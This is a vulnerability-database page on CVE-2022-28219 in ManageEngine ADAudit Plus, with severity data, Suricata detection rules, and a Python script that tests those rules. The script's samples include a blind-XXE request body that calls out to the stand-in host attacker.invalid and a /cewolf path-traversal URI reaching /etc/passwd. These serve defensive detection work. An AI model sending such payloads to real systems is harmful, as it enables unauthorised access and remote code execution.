CVE-2022-28219
Published 2022-04-05
CVE-2022-28219: Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
Priority: P1 · 94 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW: Exploited · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 97.01% (99.9th percentile)
Affected (2 ranges, CPE-style vendor/product data)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zohocorp | manageengine_adaudit_plus | <= 6.0 | build 7060 (per vendor advisory) |
| zohocorp | manageengine_adaudit_plus | unspecified | build 7060 (per vendor advisory) |
Note: the "<= 6.0" range is the CPE version field and does not express ADAudit Plus build numbers; the vendor's patch threshold is build 7060, so check the installed build rather than the major version.
Detection & IOCs (extracted from sources)
snort (sid:2037216, directory traversal)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization"; flow:established,to_server; http.uri; content:"/cewolf/"; fast_pattern; content:"?img="; distance:0; pcre:"/^(?:\/?\.\.?\/){2}/R"; content:"|2e 2f|"; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; classtype:attempted-admin; sid:2037216; rev:1; metadata:created_at 2022_06_30, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_06_30, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)
snort (sid:2037217, XXE)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/agent/tabs/agentData"; endswith; fast_pattern; http.request_body; content:"|22|Task|20|Content|22|"; content:"<?"; distance:0; content:"<!ENTITY|20|"; distance:0; reference:url,www.horizon3.ai/red-team-blog-cve-2022-28219/; reference:cve,2022-28219; classtype:attempted-admin; sid:2037217; rev:1; metadata:attack_target Server, created_at 2022_06_30, cve CVE_2022_28219, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2022_06_30, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes: |2e 2f| (hex for "./", the traversal segment the sid:2037216 rule anchors on)
- Path traversal: sid:2037216 matches a URI containing /cewolf/ followed by ?img= and, immediately after it, at least two ./ or ../ segments (the pcre is relative to the ?img= match). URL-encoded and literal forms are both caught because the rule inspects the normalized http.uri buffer, and the rule does not test the HTTP method. (Horizon3 write-up)
- XXE: sid:2037217 matches a POST whose URI ends in /api/agent/tabs/agentData and whose body contains the JSON key "Task Content" followed by an XML declaration (<?) and then an <!ENTITY declaration, the shape of a blind (out-of-band) XXE payload. (Horizon3 write-up)
- The nuclei template confirms exploitation by requiring both an out-of-band HTTP interaction (interactsh_protocol: http) and the string ManageEngine in the response body, i.e. an XXE-triggered callback from the server. (nuclei template)
- Check Point IPS signature "Zoho ManageEngine ADAudit Plus Remote Code Execution (CVE-2022-28219)" covers the exploit chain at the network layer. (Check Point)
- Only builds before 7060 are affected; installations at build 7060 or later are not vulnerable. (vendor advisory)
- This is a chained attack: the /cewolf path traversal is combined with the blind XXE in /api/agent/tabs/agentData to reach unauthenticated RCE, so both endpoints should be monitored together for full coverage.
- The XXE rule (sid:2037217) carries only Medium confidence: legitimate agent submissions to the same endpoint also carry XML in "Task Content", so expect some false positives and treat the <!ENTITY component as the discriminating part.
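To make the two rules above concrete, here is an added example (not code from this page, from Emerging Threats or from ManageEngine) that re-implements their matching logic in plain Python and runs it over constructed sample requests. It assumes the engine's http.uri buffer is percent-decoded before matching (modelled by decode_uri) and that the attacker host name and request bodies below are made up for illustration.

```python
"""Plain-Python model of the two ET Open rules for CVE-2022-28219.

Added example: not code from the page, Emerging Threats or ManageEngine.
It re-implements the matching logic of sid:2037216 (traversal on
/cewolf/?img=) and sid:2037217 (XXE in /api/agent/tabs/agentData) so the
rules can be exercised offline. Assumption: http.uri is percent-decoded
before matching (decode_uri); all sample requests are constructed.
"""
import re
from urllib.parse import unquote

# sid:2037216: "/cewolf/", then "?img=", then (relative to the end of that
# match, the pcre's /R flag) at least two "./" or "../" segments.
TRAVERSAL_RE = re.compile(r"/cewolf/.*?\?img=(?:/?\.\.?/){2}")
TRAVERSAL_BYTES = "./"  # the rule's trailing content:"|2e 2f|", non-relative


def decode_uri(uri: str) -> str:
    """Approximate the normalized http.uri buffer: one round of %XX decoding."""
    return unquote(uri)


def ordered_contents(buf: bytes, needles: list) -> bool:
    """content:"a"; content:"b"; distance:0; ... semantics: each needle must
    occur after the end of the previous match, in order."""
    pos = 0
    for needle in needles:
        idx = buf.find(needle, pos)
        if idx < 0:
            return False
        pos = idx + len(needle)
    return True


def matches_traversal(uri: str) -> bool:
    """sid:2037216. Method-agnostic: the rule has no http.method test."""
    norm = decode_uri(uri)
    return TRAVERSAL_RE.search(norm) is not None and TRAVERSAL_BYTES in norm


def matches_xxe(method: str, uri: str, body: bytes) -> bool:
    """sid:2037217: POST, URI ending in the agentData path, and in the body
    the JSON key "Task Content" followed by "<?" followed by "<!ENTITY "."""
    if "POST" not in method or not uri.endswith("/api/agent/tabs/agentData"):
        return False
    return ordered_contents(body, [b'"Task Content"', b"<?", b"<!ENTITY "])


def classify(method: str, uri: str, body: bytes = b"") -> list:
    """Return the sids that would fire for one request."""
    hits = []
    if matches_traversal(uri):
        hits.append(2037216)
    if matches_xxe(method, uri, body):
        hits.append(2037217)
    return hits


# Constructed sample requests (not real traffic); attacker.invalid is made up.
SAMPLES = {
    # Legitimate-looking agent upload: XML present, but no DTD -> no alert.
    "benign_agent_post": ("POST", "/api/agent/tabs/agentData",
        b'[{"Task Content": "<?xml version=\\"1.0\\"?><data>ok</data>"}]'),
    # Blind XXE: parameter entity fetching an external DTD -> 2037217.
    "xxe_agent_post": ("POST", "/api/agent/tabs/agentData",
        b'[{"Task Content": "<?xml version=\\"1.0\\"?><!DOCTYPE d [<!ENTITY % xxe '
        b'SYSTEM \\"http://attacker.invalid/x.dtd\\"> %xxe;]>"}]'),
    # Literal traversal in the cewolf image parameter -> 2037216.
    "traversal_literal": ("GET", "/cewolf/?img=../../../../etc/passwd", b""),
    # Percent-encoded traversal; caught only because the URI is decoded first.
    "traversal_encoded": ("GET", "/cewolf/?img=%2e%2e%2f%2e%2e%2fchart.png", b""),
    # Ordinary chart fetch -> no alert.
    "benign_cewolf": ("GET", "/cewolf/?img=chart-123.png", b""),
}


def run_samples() -> dict:
    """Map each sample name to the sids it triggers."""
    return {name: classify(*req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, sids in run_samples().items():
        print(f"{name:20s} -> {sids or 'no alert'}")
```

Two things the run makes visible: the traversal rule fires on any method, so a HEAD or GET probe is as visible as a real exploitation attempt, and the XXE rule ignores XML in "Task Content" until an <!ENTITY declaration follows the XML declaration, which is where its Medium confidence comes from (a legitimate submission that ships its own DTD would also alert).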
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| VulnCheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-cgv8-9r56-pqqh · ghsa_unreviewed · 2022-04-06 · CWE-611 · CRITICAL
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
VulnCheck
Zoho manageengine_adaudit_plus Improper Restriction of XML External Entity Reference · vulncheck · 2022 · CVSS 9.8 · CRITICAL
Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.
Affected: Zoho manageengine_adaudit_plus
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References (Shadowserver honeypot statistics):
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-28219
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2022-28219
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-
Suricata
ET EXPLOIT Possible ManageEngine ADAudit Plus Directory Traversal Leading to Deserialization · suricata · 2022-06-30 · sid:2037216
Rule: the full rule text is listed under Detection & IOCs above; the copy in this entry was truncated in extraction.
Suricata
ET EXPLOIT Possible ManageEngine ADAudit Plus XXE (CVE-2022-28219) · suricata · 2022-06-30 · CVSS 9.8 · CRITICAL · sid:2037217
Rule: the full rule text is listed under Detection & IOCs above; the copy in this entry was truncated in extraction.
Metasploit
ManageEngine ADAudit Plus CVE-2022-28219 · metasploit · CVSS 9.8 · CRITICAL
This module exploits CVE-2022-28219, a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060: a path traversal in the /cewolf endpoint and a blind XXE in the /api/agent/tabs/agentData endpoint, chained to upload and execute an executable file.
Nuclei
Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution · nuclei · CVSS 9.8 · CRITICAL
(The template name says "<7600"; the vendor's fixed build is 7060.)
Template excerpt. The raw request section (a POST to /api/agent/tabs/agentData whose JSON "Task Content" string carries an XML DTD with a parameter entity, %xxe, pointing at the interactsh callback URL) was lost in extraction; only its tail and the matchers survive:
```yaml
# [request section lost in extraction; the JSON body ends as follows]
        ... %xxe; ]>"
      }
    ]
    headers:
      Content-Type: application/json
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
      - type: word
        part: body
        words:
          - "ManageEngine"
# digest: 490a0046304402207f16bc6eabbf4b8d36f635780701d0c9fafb11dfa9709f133af39432e49a4367022074293b48ec128a58ed2ded2b0b6b28471fd99d226732fa423b9916103d43b5b9:922c64590222798bb761d5b6d8e72950
```
Checkpoint
4th July – Threat Intelligence Report · blogs_checkpoint · 2022-07-04 (also indexed under CVE-2021-34473)
## 4th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th July, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Iranian steel manufacturing plants have suffered a cyberattack which reportedly forced them to halt production. The hacker group Gonjeshke Darande, which has previously attacked the Iranian railway system, assumed responsibility for the attack. Check Point Research found and analyzed a malware sample used as part of this attack,
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now · blogs_tenable · 2022-07-01
Tenable
CVE-2022-28219: Proof-of-Concept Published for Unauthenticated RCE in Zoho ManageEngine ADAudit Plus · blogs_tenable · 2022-06-30 · CVSS 9.8 · CRITICAL
References
- http://cewolf.sourceforge.net/new/index.html
- http://packetstormsecurity.com/files/167997/ManageEngine-ADAudit-Plus-Path-Traversal-XML-Injection.html
- https://manageengine.com
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html